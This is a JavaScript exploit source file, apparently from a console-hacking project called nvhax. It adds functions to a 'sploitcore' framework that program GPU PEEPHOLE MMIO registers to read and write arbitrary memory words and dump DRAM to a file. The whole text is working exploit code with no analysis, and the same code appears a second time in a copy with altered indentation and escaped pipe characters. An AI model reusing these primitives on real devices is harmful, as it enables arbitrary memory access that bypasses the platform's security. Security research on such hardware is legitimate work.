hexkyz/nvhax_peephole.js

## nvhax_peephole.js
sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) {
    // Map GPU MMIO
    var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);

    // Write the channel's iova in PEEPHOLE PBUS register
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));

    // Write the GPU virtual address in PEEPHOLE registers
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);

    var mem_buf = this.malloc(mem_size);

    // Dump memory
    for (var i = 0; i < (mem_size / 0x04); i++)
    {
        var val = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x60014));
        this.write4(val, mem_buf, (i * 0x04)/0x04);
    }

    this.memdump(mem_buf, mem_size, "memdumps/dram.bin");
    this.free(mem_buf);
}

sploitcore.prototype.nvhax_peephole_read32 = function(gpu_io_vaddr, ch_iova, gpu_va) {
    // Write the channel's iova in PEEPHOLE PBUS register
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));

    // Write the GPU virtual address in PEEPHOLE registers
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);

    // Read out one word
    var mem_val = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x60014));

    return mem_val;
}

sploitcore.prototype.nvhax_peephole_write32 = function(gpu_io_vaddr, ch_iova, gpu_va, mem_val) {
    // Write the channel's iova in PEEPHOLE PBUS register
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));

    // Write the GPU virtual address in PEEPHOLE registers
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);

    // Write in one word
    this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60014), mem_val);
}
	sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) {
	// Map GPU MMIO
	var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);

	// Write the channel's iova in PEEPHOLE PBUS register
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 \| ch_iova));

	// Write the GPU virtual address in PEEPHOLE registers
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);

	var mem_buf = this.malloc(mem_size);

	// Dump memory
	for (var i = 0; i < (mem_size / 0x04); i++)
	{
	var val = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x60014));
	this.write4(val, mem_buf, (i * 0x04)/0x04);
	}

	this.memdump(mem_buf, mem_size, "memdumps/dram.bin");
	this.free(mem_buf);
	}

	sploitcore.prototype.nvhax_peephole_read32 = function(gpu_io_vaddr, ch_iova, gpu_va) {
	// Write the channel's iova in PEEPHOLE PBUS register
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 \| ch_iova));

	// Write the GPU virtual address in PEEPHOLE registers
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);

	// Read out one word
	var mem_val = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x60014));

	return mem_val;
	}

	sploitcore.prototype.nvhax_peephole_write32 = function(gpu_io_vaddr, ch_iova, gpu_va, mem_val) {
	// Write the channel's iova in PEEPHOLE PBUS register
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 \| ch_iova));

	// Write the GPU virtual address in PEEPHOLE registers
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);

	// Write in one word
	this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60014), mem_val);
	}